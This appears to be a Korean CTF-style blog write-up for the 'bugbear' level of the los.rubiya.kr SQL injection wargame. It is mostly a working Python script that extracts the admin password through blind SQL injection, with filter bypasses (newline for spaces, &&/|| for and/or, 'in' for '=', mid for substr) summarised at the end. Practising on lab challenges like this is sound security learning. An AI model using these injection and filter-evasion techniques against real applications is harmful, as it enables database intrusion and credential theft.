해킹/writeup

los.rubiya.kr - bugbear

rmagur1203 2021. 8. 29. 01:15
import requests

pw = ""
cookie = {"PHPSESSID": "bs5vokabo2qae2ome4934v09gr"}
page = "bugbear_19ebf8c8106a5323825b5dfa1b07ac1f"
code = '0||id%0ain%0a("admin")'

space = '%0a'
andsign = '%26%26'
equal = 'in'
_substr = 'mid'
_ascii = 'ord'

length = 0

print("find length")
for i in range(1, 32):
    url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
        f'{code}{space}{andsign}{space}length(pw){space}{equal}{space}({str(i)})'
    print(url)
    res = requests.get(url, cookies=cookie)
    if "Hello admin" in res.text:
        length = i
        print(i)
        break;

print("find password")
for i in range(1, length + 1):
    for j in range(32, 128):
        ch = chr(j).replace('"', '\\"')
        url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
            f'{code}{space}{andsign}{space}{_substr}(pw,{str(i)},1){space}{equal}{space}("{ch}")'
        print(url)
        res = requests.get(url, cookies=cookie)
        if "Hello admin" in res.text:
            pw += chr(j)
            print(pw)
            break

ord 빼버리고 그냥 문자열이랑 비교하고

비교는 in 으로 하고,

스페이스바는 \n 개행으로 하고

and와 or은 &&와 ||로 쓴다.

728x90